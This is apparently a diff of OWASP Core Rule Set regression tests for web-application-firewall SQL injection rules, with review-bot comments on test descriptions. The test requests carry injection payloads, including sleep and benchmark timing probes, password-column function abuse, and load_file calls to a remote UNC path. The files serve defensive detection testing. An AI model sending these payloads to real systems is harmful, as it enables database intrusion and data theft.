sleep(4) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 17 desc: "SQLite 'json' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 18 desc: "SQLite 'json_valid' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 19 desc: "SQLite 'glob' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);"
- version: HTTP/1.0
- output:
- log_contains: id "942150"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942150"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml
index 1b938cf32..baff15efd 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml
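Review bot: Test 5 (`+ - test_id: 5` followed directly by `stages:`) is the only entry in this hunk without a `desc`, and now that `test_title` has been dropped it carries no human-readable description at all; add one in line with its neighbours, e.g. `desc: "Time-based SQL injection using nested select and sleep()"`. Several other descriptions are too generic to tell a maintainer what the rule is expected to match: "Simple injection" covers the PHP `${@print(chr(...))}` and `{${sleep(12)}}` payloads (tests 12 and 13) and "Advanced injection" covers the Python `eval(compile(...))` and JavaScript function payloads (tests 14 and 15), whereas tests 17 to 19 helpfully name the function (`json`, `json_valid`, `glob`) and that pattern would suit the earlier entries too. These are wording changes only; the request `data` values must stay byte-for-byte as they are, since the rule match depends on the exact payload.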
@@ -2,189 +2,177 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942151.yaml +rule_id: 942151 tests: - - test_title: 942151-1 + - test_id: 1 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'||(select extractvalue(xmltype('%tocob;" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 3 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 4 desc: "Simple injection using 'fetch_in_set'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=, FIND_IN_SET('22', Category )" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=, FIND_IN_SET('22', Category )" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 5 desc: "SQL injection using 'likelihood' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 6 desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 7 desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 8 desc: "SQL injection using PostgreSQL starts_with() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=starts_with(password,'a')::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=starts_with(password,'a')::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 9 desc: "SQL injection using PostgreSQL jsonb_pretty() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log_contains: id 
"942151"
+ - test_id: 10
 desc: "SQL injection using PostgreSQL json_build_object() function"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int"
- version: HTTP/1.0
- output:
- log_contains: id "942151"
- - test_title: 942151-11
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_id: 11
 desc: "SQL injection using unistr() function"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get/index.php?id=unistr(password)::int"
- version: HTTP/1.0
- output:
- log_contains: id "942151"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get/index.php?id=unistr(password)::int"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
index 6b2576b89..2d6ce1b1e 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
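Review bot: The description of test 4 (context line `desc: "Simple injection using 'fetch_in_set'"`, carried over unchanged into the new format) does not match its payload `data: "var=, FIND_IN_SET('22', Category )"`; nothing in the request mentions a `fetch_in_set` function, so the line should read `desc: "Simple injection using 'find_in_set'"`. Since this commit already rewrites every test entry in the file, it is the natural place to correct the stale description. The payload itself should stay exactly as it is.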
@@ -2,54 +2,50 @@ meta: author: "Franziska Bühler, azurit" description: Various SQL injection tests - enabled: true - name: 942152.yaml +rule_id: 942152 tests: - - test_title: 942152-1 + - test_id: 1 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" - - test_title: 942152-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942152" + - test_id: 2 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" - - test_title: 942152-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942152" + - test_id: 3 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 
encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942152"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942152"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
index 86811feb2..b499f63f2 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
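Review bot: All three tests in this hunk reuse the identical `desc: "SQL injection in request header User-Agent"`, so a failing test 2 cannot be told apart from tests 1 or 3 by its description once `test_title` is gone; naming the construct under test would help, e.g. `desc: "PostgreSQL lo_get()/encode() call in User-Agent header"` for tests 1 and 3 and `desc: "PostgreSQL starts_with() call in User-Agent header"` for test 2. As a consistency check across the commit: this file, like 942150.yaml and 942151.yaml, gains a `rule_id:` line under `meta:` where `name:` is dropped, but the 942160.yaml hunk that follows (which runs past the end of this view) appears to drop `name:` and `enabled:` without adding `rule_id: 942160`, which is worth confirming before merge.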
@@ -2,174 +2,162 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" description: None - enabled: true - name: 942160.yaml tests: - - test_title: 942160-1 + - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?sql_table=sleep%28534543%29" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sleEP(3)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sleep(5000)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(2999/**/999,Md5(NoW()" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BEncHMARk(2999999,Md5(NoW('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENCHMARK(5000000,MD5(0x48416166)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(3000000,M%445(4)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_id: 10 desc: "Detect blind SQLi attack in REQUEST_BASENAME. 
Issue #1904" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/if(now()=sysdate(),sleep(12),0)" - version: HTTP/1.0 - output: - log_contains: id "942160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/if(now()=sysdate(),sleep(12),0)" + version: HTTP/1.0 + output: + log_contains: id "942160" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml index 6dff839b3..63b5b547e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml 
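Review bot: `description: None` survives the meta rewrite at the top of the hunk, and the same placeholder is kept in 942170, 942260, 942270, 942280, 942290, 942300 and 942310. YAML parses `None` as the four-character string, not a null, so any tool that prints or indexes test metadata will show a literal "None". Since the meta block is being reshaped anyway, `description: ""` (or a one-line summary such as `description: "Common DB names, benchmark and sleep injection tests"`) would be clearer, assuming the schema accepts either.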
@@ -2,70 +2,64 @@ meta: author: "Franziska Bühler, azurit" description: None - enabled: true - name: 942170.yaml tests: - - test_title: 942170-1 + - test_id: 1 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942170" - - test_title: 942170-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942170" + - test_id: 2 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3B%20sleep%280%29" - version: HTTP/1.0 - output: - log_contains: id "942170" - - test_title: 942170-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3B%20sleep%280%29" + version: HTTP/1.0 + output: + log_contains: id "942170" + - test_id: 3 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test" stages: - - stage: - input: 
- dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=I%20sleep%20well%21" - version: HTTP/1.0 - output: - no_log_contains: id "942170" - - test_title: 942170-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=I%20sleep%20well%21" + version: HTTP/1.0 + output: + no_log_contains: id "942170" + - test_id: 4 desc: "Status Page Test - SQL injection test with select if(x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 